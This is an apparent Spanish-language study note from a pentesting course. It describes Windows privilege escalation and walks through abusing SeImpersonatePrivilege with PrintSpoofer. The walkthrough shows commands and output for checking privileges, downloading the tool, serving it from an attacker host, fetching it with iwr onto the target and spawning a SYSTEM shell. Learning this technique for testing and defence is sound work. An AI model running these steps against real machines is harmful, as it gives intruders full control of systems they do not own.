Using Exploits

Podemos usar exploits para escalar privilegios en equipos windows en tres escenarios:

Explotar application-based vulnerabilities. Esto quiere decir aplicaciones que hayan sido instaladas en el sistema y mediante algún exploit nos permitan hacer una escalada de privilegios.
Explotar vulnerabilidades en el kernel de Windows. Según la versión del kernel, puede ser vulnerable a exploits y realizar el privesc, posteriormente muestro como enumerar el kernel y buscar exploits para ello.
Abuso de privilegios de windows, como SeImpersonatePrivilege. Estos son los privilegios de windows que si nos pertenecen, podemos usarlos para escalar privilegios, SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, y SeDebug.

Explotar kernel windows

Para explotar el kernel, simplemente enumeramos el sistema con systeminfo, y esta es la información que nos interesa

Seguidamente, buscamos vulnerabilidades de la siguiente manera

En este caso vemos que hay exploit disponible para esta versión de kernel, simplemente sería necesario descargar, compilar, transferir a la máquina y ejecutar.

Explotar privilegios windows

Explico como abusar del privilegio SeImpersonatePrivilege, en primer lugar comprobamos permisos de nuestro usuario

C:\\Users\\dave> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeSecurityPrivilege           Manage auditing and security log          Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Observamos que SeImpersonatePrivilege lo tenemos de privilegio, vamos a usar PrintSpoofer para abusar de el y escalar privilegios.

Nos descargamos el binario en nuestra maquina local y lo transferimos al windows

kali@kali:~$ wget <https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe> 
...
2022-07-07 03:48:45 (16.6 MB/s) - ‘PrintSpoofer64.exe’ saved [27136/27136]

kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (<http://0.0.0.0:80/>) ...

C:\\Users\\dave> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! <https://aka.ms/PSWindows>

PS C:\\Users\\dave> iwr -uri <http://192.168.119.2/PrintSpoofer64.exe> -Outfile PrintSpoofer64.exe
iwr -uri <http://192.168.119.2/PrintSpoofer64.exe> -Outfile PrintSpoofer64.exe

Seguidamente simplemente debemos ejecutarlo con el parámetro -i y -c powershell.exe, esto nos dará una consola como nt authority\system

PS C:\\Users\\dave> .\\PrintSpoofer64.exe -i -c powershell.exe
.\\PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! <https://aka.ms/PSWindows>

PS C:\\Windows\\system32> whoami
whoami
nt authority\\system